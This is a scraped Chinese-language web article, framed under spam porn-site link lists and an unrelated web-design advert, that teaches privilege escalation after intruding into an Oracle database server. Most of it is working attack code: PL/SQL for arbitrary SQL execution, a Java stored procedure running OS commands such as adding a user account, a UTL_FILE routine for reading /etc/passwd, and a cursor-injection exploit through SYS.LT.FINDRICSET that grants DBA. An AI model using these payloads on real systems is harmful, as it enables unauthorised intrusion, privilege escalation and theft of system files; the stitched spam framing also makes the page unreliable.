日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

再進(jìn)行入侵Oracle服務(wù)器的進(jìn)一步來(lái)獲取權(quán)限時(shí)，我們需要快速的連接上Oracle服務(wù)器，此時(shí)你會(huì)發(fā)現(xiàn)，的情況有，連接之后不是dba權(quán)限，或不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升權(quán)限。

創(chuàng)新互聯(lián)主營(yíng)贛縣網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營(yíng)網(wǎng)站建設(shè)方案,app軟件定制開(kāi)發(fā),贛縣h5重慶小程序開(kāi)發(fā)公司搭建,贛縣網(wǎng)站營(yíng)銷(xiāo)推廣歡迎贛縣等地區(qū)企業(yè)咨詢

3.運(yùn)行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后發(fā)現(xiàn)oracle服務(wù)器不能連接網(wǎng)絡(luò)。

幸運(yùn)的是，

運(yùn)行

 
 
 

  
  
  
create or replace function Linx_Query (p varchar2) 
return number authid current_user is begin execute 
immediate p; return 1;end; 
 
 
 

成功!這個(gè)用戶具有create proceduce權(quán)限。

此時(shí)馬上想到創(chuàng)建java擴(kuò)展執(zhí)行命令：

 
 
 

  
  
  
create or replace and compile java source named 
“LinxUtil” as import java.io.*; public class LinxUtil extends Object 
{public static String runCMD(String args) {try{BufferedReader myReader= 
new BufferedReader
(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); 
String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” 
“;myReader.close();return str;} catch (Exception e){return e.toString();}}}  
  
  
  
begin dbms_java.grant_permission
(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘<>’, ‘execute’ );end;  
  
  
  
create or replace function LinxRunCMD(p_cmd in varchar2) 
return varchar2 as language java name 
‘LinxUtil.runCMD(java.lang.String) return String’  
  
  
  
select * from all_objects where object_name like ‘%LINX%’  
  
  
  
grant all on LinxRunCMD to public  
  
  
  
select LinxRunCMD(‘cmd /c net user linx /add’) from dual  
 
 
 

但是在第一步就卡住了，服務(wù)器由于某種未知原因 不能創(chuàng)建java擴(kuò)展!!

還好，我們還有UTL庫(kù)可以利用：

 
 
 

  
  
  
create or replace function LinxUTLReadfile 
(filename varchar2) return varchar2 is  
  
  
  
fHandler UTL_FILE.FILE_TYPE;  
  
  
  
buf varchar2(4000);  
  
  
  
output varchar2(8000);  
  
  
  
BEGIN  
  
  
  
fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);  
  
  
  
loop  
  
  
  
begin  
  
  
  
utl_file.get_line(fHandler,buf);  
  
  
  
DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);  
  
  
  
exception  
  
  
  
when no_data_found then exit;  
  
  
  
end;  
  
  
  
output := output||buf||chr(10);  
  
  
  
end loop;  
  
  
  
UTL_FILE.FCLOSE(fHandler);  
  
  
  
return output;  
  
  
  
END;  
 
 
 

UTL_FILE_DIR需要先用：

 
 
 

  
  
  
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’; 
 
 
 

指定目。但運(yùn)行后發(fā)現(xiàn)沒(méi)有權(quán)限。只好想辦法提權(quán)。

游標(biāo)注射

老外寫(xiě)了N個(gè)pdf介紹這技術(shù)，我精簡(jiǎn)了代碼：

 
 
 

  
  
  
DECLARE  
  
  
  
 
  
  
  
MYC NUMBER;  
  
  
  
BEGIN  
  
  
  
MYC := DBMS_SQL.OPEN_CURSOR;  
  
  
  
DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; 
begin execute immediate 
”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);  
  
  
  
DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  
  
  
BEGIN SYS.LT.FINDRICSET
(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;  
  
  
  
raise NO_DATA_FOUND;  
  
  
  
EXCEPTION  
  
  
  
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  
  
  
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  
  
  
END;  
 
 
 

運(yùn)行后重新連接就有dba權(quán)限了，簡(jiǎn)單吧……

現(xiàn)在可以讀取文件了：

 
 
 

  
  
  
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;  
  
  
  
select LinxUTLReadfile(‘passwd’) from dual  
 
 
 

后面就簡(jiǎn)單了，不寫(xiě)了。上述的相關(guān)內(nèi)容就是對(duì)入侵Oracle服務(wù)器進(jìn)一步獲取權(quán)限的描述，希望會(huì)給你帶來(lái)一些幫助在此方面。

【編輯推薦】

1. 在Oracle數(shù)據(jù)庫(kù)中使用PL操作COM對(duì)象
2. 對(duì)聯(lián)機(jī)備份Oracle數(shù)據(jù)的解剖
3. Oracle動(dòng)態(tài)Web開(kāi)發(fā)實(shí)例演示
4. Oracle移植到mysql中，應(yīng)注意的事項(xiàng)
5. Oracle進(jìn)程中出現(xiàn)帶鎖狀況的解決

本文題目：Oracle服務(wù)器如何進(jìn)一步的獲取權(quán)限
文章來(lái)源：http://www.dlmjj.cn/article/dhpcoji.html